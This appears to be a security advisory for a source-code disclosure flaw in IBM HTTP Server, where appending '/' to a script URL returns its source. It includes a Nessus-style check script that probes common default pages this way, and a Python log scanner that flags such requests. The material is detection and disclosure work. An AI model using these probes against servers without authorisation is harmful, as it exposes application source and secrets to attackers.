IBM HTTP Server Source Code Disclosure Vulnerability


Affected program:
IBM HTTP SERVER

Description:
An input validation vulnerability in IBM HTTP Server may lead to disclosure of script source code

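Details:
An input validation vulnerability has been found in IBM HTTP Server for the AS/400. By constructing a special web request, a remote attacker can exploit it to view source code on the server without authorization. Appending "/" to a request for a script causes that script's source code to be disclosed.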


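The following code is intended only for testing and researching this vulnerability. If you use it for improper purposes, you bear the consequences yourself.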


# This script was written by Felix Huber <huberfelix@webtopia.de>
#
# v. 1.00 (last update 08.11.01)

if(description)
{
  script_id(?????????);
  name["english"] = "IBM-HTTP-Server View Code";
  script_name(english:name["english"]);

  desc["english"] = "
IBM's HTTP Server on the AS/400 platform is vulnerable to an attack
that will show the source code of the page -- such as an .html or .jsp
page -- by attaching an '/' to the end of a URL.

Example:
http://www.foo.com/getsource.jsp/

Solution : Not yet


Risk factor : High";

  script_description(english:desc["english"]);

  summary["english"] = "IBM-HTTP-Server View Code";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2001 Felix Huber");
  family["english"] = "CGI abuses";
  script_family(english:family["english"]);
  script_dependencie("find_service.nes");
  script_dependencie("httpver.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port) port = 80;

# Common default pages, each requested with a trailing "/"
dir[0] = "/index.html";
dir[1] = "/index.htm";
dir[2] = "/index.jsp";
dir[3] = "/default.html";
dir[4] = "/default.htm";
dir[5] = "/default.jsp";
dir[6] = "/home.html";
dir[7] = "/home.htm";
dir[8] = "/home.jsp";

if(get_port_state(port))
{
  for (i = 0; dir[i]; i = i + 1)
  {
    soc = http_open_socket(port);
    if(soc)
    {
      # Append "/" to the page name
      url = string(dir[i], "/");

      req = http_get(item:url, port:port);
      send(socket:soc, data:req);
      r = recv(socket:soc, length:409600);
      close(soc);

      #display(r);

      # Report when the banner matches and the page is returned as www/unknown
      if("Server: IBM-HTTP-Server/1.0" >< r)
      {
        if("Content-Type: www/unknown" >< r)
        {
          #security_hole(port);
          display("Security Hole detected\n");
          exit(0);
        }
      }
    }
  }
}
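
For the defending side, the same request shape can be searched for in the web server's access log. The Python below is an added example, not part of the original advisory or of Felix Huber's script. It assumes NCSA Common Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: NCSA Common Log Format; adjust the pattern to your LogFormat.
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Page extensions used in the advisory text and in the script's probe list.
PAGE_EXT = (".jsp", ".html", ".htm")

def is_trailing_slash_request(target):
    """True when the path is a page name (e.g. index.jsp) followed by '/'."""
    path = unquote(target.split("?", 1)[0])  # drop the query, decode %2F
    if not path.endswith("/"):
        return False
    return path.rstrip("/").lower().endswith(PAGE_EXT)

def find_suspect_requests(lines):
    """Return one dict per logged GET/HEAD request that matches the pattern."""
    hits = []
    for line in lines:
        m = CLF.match(line.strip())
        if not m or m["method"] not in ("GET", "HEAD"):
            continue
        if is_trailing_slash_request(m["target"]):
            hits.append({
                "host": m["host"],
                "time": m["time"],
                "target": m["target"],
                # Assumption: a 200 means a body was returned and needs review.
                "served": m["status"] == "200",
            })
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Nov/2001:10:00:01 +0000] "GET /index.jsp HTTP/1.0" 200 1532',
    '198.51.100.7 - - [17/Nov/2001:10:00:05 +0000] "GET /index.jsp/ HTTP/1.0" 200 2048',
    '198.51.100.7 - - [17/Nov/2001:10:00:06 +0000] "GET /home.html/ HTTP/1.0" 404 210',
    '192.0.2.10 - - [17/Nov/2001:10:00:09 +0000] "GET /docs/ HTTP/1.0" 200 880',
    '198.51.100.7 - - [17/Nov/2001:10:00:11 +0000] "GET /default.JSP%2F?x=1 HTTP/1.0" 200 1900',
]

if __name__ == "__main__":
    for hit in find_suspect_requests(SAMPLE_LOG):
        print(hit)
```

Ordinary directory requests such as `/docs/` are not flagged; only a page name followed by a slash is.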


Affected systems:
IBM HTTP Server 1.3.3 win32
IBM HTTP Server 1.3.6 win32
IBM HTTP Server 1.3.6.4 win32
IBM HTTP Server 1.3.6.3
- Caldera OpenLinux 2.2
- IBM AIX 4.2.1
- Microsoft Windows NT 4.0
- RedHat Linux 5.2 sparc
- RedHat Linux 6.0 sparc
- S.u.S.E. Linux 6.0
- S.u.S.E. Linux 6.1
- Sun Solaris 2.6
- TurboLinux Turbo Linux 3.0.1
IBM HTTP Server 1.3.6.2 win32
IBM HTTP Server 1.3.6.2 unix
IBM HTTP Server 1.3.12.4
- IBM AIX 4.3.3
- IBM AIX 5.1
- RedHat Linux 7.1
- S.u.S.E. Linux 7.2
IBM HTTP Server 1.3.12.3
- HP HP-UX 11.0
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- Sun Solaris 2.6
- Sun Solaris 7.0
- Sun Solaris 8.0
IBM HTTP Server 1.3.12.2
- Caldera OpenLinux 2.3
- Caldera OpenLinux 2.4
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- Sun Solaris 2.6
- TurboLinux Turbo Linux 6.0
IBM HTTP Server 1.3.19
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6a
- RedHat Linux 7.1
- S.u.S.E. Linux 7.1
- Sun Solaris 2.6
- Sun Solaris 7.0

Solution:
None yet